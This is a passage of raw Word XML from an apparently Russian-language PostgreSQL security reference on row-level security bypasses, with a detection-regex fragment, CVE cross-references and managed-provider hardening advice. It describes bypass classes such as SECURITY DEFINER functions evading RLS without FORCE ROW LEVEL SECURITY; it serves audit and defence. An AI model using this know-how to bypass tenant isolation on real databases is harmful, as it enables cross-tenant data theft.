        <w:t xml:space="preserve">    "auto_explain.*Filter:.*\\(tenant_id = \\d+\\)",  # cached RLS filter from wrong role</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349585FB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # application-side cross-row consistency violations - not regex but behavioral</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6741AACC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D42524A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545BB63A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RLS_BYPASS_RISK = 8  # high — direct data exfiltration, compliance-critical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6AA4A3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Эти rules ловят основные SQL patterns + требуют cross-check с metadata (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_class</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_proc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_roles</w:t>
      </w:r>
      <w:r>
        <w:t>) для полной audit-полноты. PG-version-detection — критичный component для CVE-detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3AEBB0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Перекрёстные ссылки</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72709D0B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13.1 SET ROLE / CVE-2024-10978</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — тот же CVE как 3.17.3. Cross-ref обязателен. Граница: 3.13.1 — privilege escalation; 3.17.3 — data exfiltration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6545B497" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13.6 SECURITY DEFINER + SET search_path</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — parallel class privilege escalation в SD-функциях. Связан с 3.17.5 (RLS bypass через SD).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2DFFF7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16.5 SECURITY DEFINER + dynamic SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — third class уязвимостей в SD-функциях (identifier injection). Все три (3.13.6, 3.16.5, 3.17.5) — components одного класса «SECURITY DEFINER hygiene».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C16AEB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.8.6 pg_stats_ext leak (CVE-2024-4317)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — related с 3.17.4 (CVE-2025-8713). Граница: 3.8.6 — view permissions bypass; 3.17.4 — planning-phase custom operator bypass. Параллельные подкатегории statistics-leak class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682F7815" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.6.4 lo_import / file r/w</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — RLS bypass через 3.17 даёт data access, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не file/RCE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> automatically. Для RCE требуется отдельный privilege escalation (3.13) или COPY TO PROGRAM (3.7.1) под superuser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001EBF1C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7 RCE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — отдельная категория. RLS обход → data leak, но not RCE; для RCE нужен independent vector.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369643DA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.3 Хронология 2023</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — CVE-2023-39418 (3.17.2) в context 2023 batch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB5E241" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.4 Хронология 2024</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — CVE-2024-10976 / CVE-2024-10978 (3.17.1 / 3.17.3) в context 14.11.2024 batch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B5BA99" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.5 Хронология 2025</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — CVE-2025-8713 (3.17.4) в context 14.08.2025 batch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C43109" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.6 Версионные таблицы минор-релизов</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — sweep dates fix для всех CVE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C99FB9D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.3 Принцип наименьших привилегий</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FORCE ROW LEVEL SECURITY</w:t>
      </w:r>
      <w:r>
        <w:t>, ограничение CREATE OPERATOR/FUNCTION, NOT-superuser owner для SD-функций.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A568B9B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.5 Конфиги PostgreSQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>auto_explain.log_min_duration</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для diagnostics 3.17.1/3.17.3 plan-cache issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55367D6B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Managed-провайдеры (RDS, Cloud SQL, Supabase)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26764FFC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>RLS — standard feature, доступная во всех managed providers. Specific provider behavior:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E72F6B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AWS RDS / Aurora PostgreSQL</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7712F089" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   3.17.1 / 3.17.3 (CVE 2024-10976/10978): RDS обычно обновляется на patched minor через 1–2 недели после upstream. Production кластеры на legacy minor versions — vulnerable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA2C1B7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   3.17.2 (MERGE CVE-2023-39418): почти все RDS PG15 запущены на 15.4+ (релиз 15.0 был в pre-RDS-availability окне).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEE4C63" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   3.17.4 (CVE-2025-8713): RDS Performance Insights может flag unusual operator queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F57A09" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   3.17.5: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rds_superuser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> обычно owner таблиц → SD-функции от него триггерят RLS bypass без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FORCE RLS</w:t>
      </w:r>
      <w:r>
        <w:t>. RDS не запрещает создавать такие функции.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E577FB7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Google Cloud SQL</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCB5E28" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Аналогичная patch policy. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cloudsqlsuperuser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — equivalent для 3.17.5.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE7F3BB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   CloudSQL Insights / Query Insights для runtime monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067E268D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Supabase</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3099ABFE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Critical context</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Supabase архитектура </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>массово использует SECURITY DEFINER функции для RLS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. PostgREST RPC patterns часто базируются на SD-functions с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>auth.uid()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> checks внутри.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1267EEAA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Если разработчик пропускает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FORCE ROW LEVEL SECURITY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + uses SD-функцию без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>auth.uid()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> filter — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>direct 3.17.5 уязвимость</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383BBCDC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Supabase docs recommend </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FORCE RLS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>auth.uid()</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>auth.jwt()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> filters внутри функций. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Audit Supabase deployment на adherence — critical.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C91A3D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure Database for PostgreSQL</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C007997" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   То же поведение; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>azure_pg_admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> имеет owner-like privileges для RLS bypass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4945711E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Audit logs (через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pgaudit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> extension) рекомендуется enable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08116EE2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key provider-difference для 3.17</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: на managed providers </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>upgrade на patched minor PG-version часто не controlled by tenant</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — provider applies patches на их schedule. Это означает, что для CVE-anchored bypass (3.17.1, 3.17.3, 3.17.4) tenant зависит от provider's patch SLA. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Always check current PG version</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT version()</w:t>
      </w:r>
      <w:r>
        <w:t>) для confirmation что fix applied.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD7858E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Для defence-in-depth на managed providers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2B6DEE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`FORCE ROW LEVEL SECURITY`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на все critical tables — закрывает 3.17.5 и mitigates impact future CVE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F251907" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`pgaudit` extension</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — детальный log для всех SD-function calls и MERGE-statements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3E0C04" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Application-side cross-row consistency checks</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — detection cross-tenant leaks даже до server-side fix.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405FD390" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`SET LOCAL` вместо `SET` для session-variables</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — mitigates reset-path 3.17.3.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="001947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87FE6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D00C1048"/>
    <w:lvl w:ilvl="0" w:tplc="E1B2217C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="16A404BC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="095ED932">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="CA8AB30C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="4240FAF0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="8AB4C2FE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="10C84EDA">
